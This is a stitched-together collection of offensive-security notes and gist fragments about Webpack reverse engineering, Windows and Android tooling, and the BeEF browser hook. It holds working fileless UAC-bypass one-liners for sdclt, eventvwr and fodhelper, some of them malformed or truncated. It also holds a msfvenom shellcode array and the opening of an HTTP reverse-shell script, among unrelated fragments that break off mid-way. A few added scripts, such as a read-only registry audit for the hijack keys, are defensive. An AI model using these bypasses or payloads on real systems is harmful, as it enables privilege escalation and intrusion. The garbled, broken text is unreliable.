Some notes and techniques for reverse engineering Webpack (and a little bit about React/Vue/Angular) apps.
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 565

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
.
..
........
@
*
*.*
*.*.*
🎠
#sdclt fileless UAC bypass
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
#eventvwr fileless UAC bypass
%windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $executablepath = "Start-Process -FilePath 'cmd.exe'";$cmd = 'Start-Process -FilePath {0} -ArgumentList "/c reg add "HKCU\Software\Classes\mscfile\shell\open\command" /f /d "{0} /c %windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -c \"IEX $executablepath;IEX $cmd) "' -f $env:comspec;
#fodhelper fileless UAC bypass
New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Value "cmd /c start powershell.exe" -Force;New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force;Start-Process "C:\Windows\System32\fodhelper.exe";Remove-Item "HKCU:\Software\Classes\ms-settings\
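All three one-liners above share one mechanism: write a per-user registry key that an auto-elevating Microsoft binary (sdclt.exe via the App Paths entry for control.exe, eventvwr.exe via the mscfile handler, fodhelper.exe via the ms-settings handler) consults, launch the binary, then delete the key. Because the keys live under HKCU they are writable and readable without elevation, and the bypasses are written to remove them afterwards. The following is an added check, not part of the gist above, that lists whatever is left behind under those exact paths so a defender or a tester cleaning up can see it; the key list is taken from the commands above, and nothing here modifies the registry.

```powershell
# Added example (not from the original gist): audit the HKCU keys hijacked by the
# sdclt / eventvwr / fodhelper fileless UAC bypasses. Runs unelevated.
$hijackKeys = @(
    # fodhelper.exe reads the per-user ms-settings protocol handler first
    'HKCU:\Software\Classes\ms-settings\Shell\Open\command',
    # eventvwr.exe resolves the .msc handler through HKCU\Software\Classes
    'HKCU:\Software\Classes\mscfile\shell\open\command',
    # sdclt.exe launches control.exe, which honours the per-user App Paths entry
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe'
)

function Get-UacHijackKeys {
    foreach ($key in $hijackKeys) {
        if (Test-Path -LiteralPath $key) {
            $item = Get-Item -LiteralPath $key
            [pscustomobject]@{
                Key             = $key
                Default         = $item.GetValue('')                 # command that will be run
                DelegateExecute = $item.GetValue('DelegateExecute')  # empty string forces the command path
            }
        }
    }
}

$findings = Get-UacHijackKeys
if ($findings) {
    Write-Warning 'Per-user hijack keys are present; none of these exist on a clean profile:'
    $findings | Format-List
} else {
    Write-Host 'No UAC bypass hijack keys found under HKCU.'
}
```

The check is read-only on purpose. If a key turns up and you want to remove it, `Remove-Item -LiteralPath $key -Recurse` from the same unelevated session is enough, since the user owns the HKCU hive. Note that the bypasses only work while UAC is at its default level; with "Always notify" the auto-elevate path prompts and the hijacked command runs unelevated.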
Say you want to read an application's shared preferences under /data/data/com.mypackage.
You could try adb shell followed by run-as com.mypackage
(or, in one step, adb shell run-as com.mypackage ls /data/data/com.mypackage/shared_prefs),
but on a production release build downloaded from an app store you are most likely to see:
run-as: Package 'com.mypackage' is not debuggable
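run-as only works when the package manifest sets android:debuggable="true", and release builds from an app store do not. Rather than discovering that from the error message, you can read the flag from the package manager first. The following is an added helper, not part of the original notes; it assumes adb is on PATH with a single device attached, and com.mypackage is a placeholder.

```powershell
# Added example (not from the original notes): check the DEBUGGABLE flag before
# attempting run-as, then list shared_prefs only when run-as can succeed.
function Test-AndroidDebuggable {
    param([Parameter(Mandatory)][string]$Package)
    # dumpsys prints a line such as "flags=[ DEBUGGABLE HAS_CODE ALLOW_BACKUP ]" for debug builds
    $dump = & adb shell dumpsys package $Package 2>&1
    $m = [regex]::Match(($dump -join "`n"), '(?m)^\s*flags=\[([^\]]*)\]')
    if (-not $m.Success) {
        throw "Package '$Package' not found in dumpsys output (is the device attached and the app installed?)"
    }
    return (($m.Groups[1].Value -split '\s+') -contains 'DEBUGGABLE')
}

function Get-AndroidSharedPrefs {
    param([Parameter(Mandatory)][string]$Package)
    if (-not (Test-AndroidDebuggable -Package $Package)) {
        Write-Warning "$Package is not debuggable; run-as will refuse it (run-as: Package '$Package' is not debuggable)."
        return
    }
    # Same command as in the notes above, executed only when it can work
    & adb shell run-as $Package ls -l "/data/data/$Package/shared_prefs"
}

Get-AndroidSharedPrefs -Package 'com.mypackage'
```

On a non-debuggable build the remaining options are a rooted device or emulator, or repackaging the APK with the debuggable flag set; both are outside the scope of these notes.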
#pragma comment(lib, "Shell32.lib")
#include <windows.h>
#include <shlobj.h>
// msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe
int buf_len = 193;
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
import requests
import json
import pprint
import sys
import dns.message
import dns.query
import dns.rdatatype
import dns.resolver
import dns.reversename
import time
After a little more research, the 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)
These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.
Basic gist after running the PS script statements:
- Loads the C# project from a file or web URL
- Creates various tmp files
- Compiles with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
- Converts to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]
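The chain listed above (source from file or URL, temp files, csc.exe with a .cmdline response file, cvtres.exe) is what Windows PowerShell's CodeDom-backed compilation does under the hood, so the shortest way to reproduce it is Add-Type. The following is an added example, not the gist's own script; the inline C# source, type name and the file/URL placeholders are constructed for illustration.

```powershell
# Added example (not from the original gist): build and run C# from PowerShell
# through the same csc.exe / cvtres.exe temp-file path described above.
function Invoke-CSharpFromSource {
    param(
        [Parameter(Mandatory)][string]$Source,    # C# source text
        [Parameter(Mandatory)][string]$TypeName,  # full name of a public type in $Source
        [Parameter(Mandatory)][string]$Method     # public static method with no parameters
    )
    # Windows PowerShell 5.1: Add-Type goes through CodeDom, which writes *.cs, *.cmdline
    # and *.tmp files under $env:TEMP and spawns csc.exe (then cvtres.exe) as children of
    # powershell.exe. PowerShell 7 compiles with Roslyn in-process and spawns nothing.
    $types = Add-Type -TypeDefinition $Source -Language CSharp -PassThru
    $type  = $types | Where-Object { $_.FullName -eq $TypeName }
    if (-not $type) { throw "Type '$TypeName' not found in compiled source" }
    return $type.GetMethod($Method).Invoke($null, $null)
}

# Inline source, constructed for this example
$source = @'
using System;
public static class Demo
{
    public static string Run()
    {
        return "compiled and loaded from " + Environment.GetEnvironmentVariable("TEMP");
    }
}
'@
Invoke-CSharpFromSource -Source $source -TypeName 'Demo' -Method 'Run'

# The same, with the source loaded from a file or a web URL as the notes describe (placeholder paths):
# Invoke-CSharpFromSource -Source (Get-Content .\Program.cs -Raw) -TypeName 'Demo' -Method 'Run'
# Invoke-CSharpFromSource -Source (Invoke-WebRequest 'https://example.invalid/Program.cs' -UseBasicParsing).Content -TypeName 'Demo' -Method 'Run'
```

Add-Type refuses to redefine a type name already loaded in the session, so re-running the script in the same window requires a new type name or a fresh process. For the detection side, the distinctive artifact is exactly the one the notes list: powershell.exe spawning csc.exe with an @...\Temp\*.cmdline argument, followed by cvtres.exe, which a Sysmon process-creation rule can catch.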
Most of the logic resides in https://github.com/beefproject/beef/tree/master/core/main/client
https://github.com/beefproject/beef/blob/master/core/main/client/beef.js establishes the beef object in the browser's DOM
window.onload then runs beef_init(): https://github.com/beefproject/beef/blob/master/core/main/client/init.js#L24
Within beef_init() we run beef.net.browser_details(): https://github.com/beefproject/beef/blob/master/core/main/client/init.js#L67
Within beef.net.browser_details() we gather the response from beef.browser.getDetails(): https://github.com/beefproject/beef/blob/master/core/main/client/net.js#L503
<#
Author: Casey Smith @subTee
License: BSD3-Clause
.SYNOPSIS
Simple Reverse Shell over HTTP. Execute Commands on Client.